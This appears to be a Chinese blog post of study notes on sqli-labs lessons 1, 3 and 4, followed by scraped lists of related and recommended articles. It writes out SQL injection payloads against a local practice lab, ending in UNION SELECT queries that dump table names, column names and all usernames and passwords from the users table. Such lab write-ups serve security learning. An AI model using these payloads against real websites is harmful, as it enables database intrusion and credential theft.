0x01.less1

id=1/ id=1 and 1=1结果正常

id=1 and 1=2结果正常,不合理

id=1'提示:

分析:

use near '   '   1'   ' LIMIT 0,1    '

所以正确sql语句 为:

select username,password from table where id='input'

所以:

id = 1' and '1'='1

结果正确

即:

select username,password from table where id='1' and '1'='1'

或者:

id = 1' and 1=1 --+

结果正确

即:

select username,password from table where id='1' and 1=1 --+'

0x02.less03

输入:

http://127.0.0.1/Sqli-Labs/Less-3/?id=1 and 1=2

得到:

所以存在sql注入漏洞

于是输入:

id=1'得到提示:

near '      '     1'     ') LIMIT 0,1      ' at line 1

所以 猜测sql语句为:

select username,password from table where id = ('input')

所以注入语句可以是:

id=1') and  ('1'='1

即:select username,password from table where id = ('1') and  ('1'='1')

注入成功

或者:

id=1') and 1=1 --+

即:select username,password from table where id = ('1') and 1=1 --+')

注入成功

0x04.less4

注入语句:

http://127.0.0.1/Sqli-Labs/Less-4/?id=1") and 1=2 --+

或者:

http://127.0.0.1/Sqli-Labs/Less-4/?id=(1" and "1=2

测试:

http://127.0.0.1/Sqli-Labs/Less-4/
?id=1") order by 3 --+
字段为3

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,2,3 --+

可以利用的字段为2,3

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,table_name,3 from information_schema.tables where table_schema='secu
rity' --+

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,table_name,3 from information_schema.tables where table_schema='secu
rity' limit 3,1 --+

第4个表名:

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='secu
rity' --+

4 个表名全部显示 :

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

显示列名:

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,group_concat(username,password),3 from users --+

显示users表里所有的用户名和密码:

sqli-labs less1 &&less3&&less4学习心得的更多相关文章

  1. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  2. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  3. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  4. 我的MYSQL学习心得(一) 简单语法

    我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(四) 数据类型 我的MYSQL学习心得(五) 运 ...

  5. 我的MYSQL学习心得(二) 数据类型宽度

    我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(四) 数据类型 我的MYSQL学习心得(五) 运 ...

  6. 我的MYSQL学习心得(三) 查看字段长度

    我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(四) 数据类型 我的MYSQL学习心得(五) 运 ...

  7. 我的MYSQL学习心得(四) 数据类型

    我的MYSQL学习心得(四) 数据类型 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(五) 运 ...

  8. 我的MYSQL学习心得(五) 运算符

    我的MYSQL学习心得(五) 运算符 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(四) 数据 ...

  9. 我的MYSQL学习心得(六) 函数

    我的MYSQL学习心得(六) 函数 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(四) 数据类 ...

随机推荐

  1. mysql issue:

    ####0 https://yq.aliyun.com/ziliao/53466 首先,很荣幸你找到了这篇文章... 如果你忘记了mysql的密码不妨试试以下这个方法. 1.打开my.cnf  代码如 ...

  2. 动态时间规整DTW

    动态时间规整DTW 1 概述 动态时间规整是一个计算时间序列之间距离的算法,是为了解决语音识别领域中语速不同的情况下如何计算距离相似度的问题. 相对于用经典的欧式距离来计算相似度而言,DTW在数据点个 ...

  3. 如何使用Spring Security手动验证用户

    1.概述 在这篇快速文章中,我们将重点介绍如何以编程方式在Spring Security和Spring MVC中设置经过身份验证的用户. 2. Spring Security 简而言之,Spring ...

  4. 老生常谈Java虚拟机垃圾回收机制(必看篇)

    二.垃圾收集 垃圾收集主要是针对堆和方法区进行. 程序计数器.虚拟机栈和本地方法栈这三个区域属于线程私有的,只存在于线程的生命周期内,线程结束之后也会消失,因此不需要对这三个区域进行垃圾回收. 判断一 ...

  5. 洛谷 P1690 贪婪的Copy

    题目 本题难度较低,操作比较简单,首先对于范围较小的N(<=100),我们可以先跑一遍floyd,求出任意两点之间的最短路.对于很小的p(<=15),我们可以直接考虑全排列,运用到next ...

  6. window.open()弹出窗口参数说明及居中设置

    window.open()可以弹出一个新的窗口,并且通过参数控制窗口的各项属性. 最基本的弹出窗口代码 window.open('httP://codeo.cn/'); window.open()各参 ...

  7. python os,sys模块的使用

    首先,os模块是用来与操作系统进行交互的模块,可以对操作系统上的一些东西进行操作 而sys是用来对解释器进行一些操作的 一.os os.getcwd() 获取当前工作目录,即当前python脚本工作的 ...

  8. selenium-Python之上传文件

    对于web 页面的上传功能实现一般有一下两种方式 普通上传:普通的附件上传是将本地文件的路径作为一个值放在input标签中,通过form表单将这个值提交给服务器 插件上传:一般是指基于flash.ja ...

  9. Linux下如何修改用户默认目录

      Linux下默认的用户目录一般为/home/xxx(root用户除外),有些时候我们可能需要修改这个目录,下面我就给大家分享2中修改的方法 工具/原料 Linux操作系统 方法/步骤 1 1.切换 ...

  10. 11gR2 如何诊断节点重启问题

    本文对如何诊断11gR2 GI环境下的节点重启问题进行了一些介绍. 首先,像10g版本一样,我们首先介绍在GI中能够导致节点重启的进程.1.Ocssd.bin:这个进程的功能和10g版本的功能基本差不 ...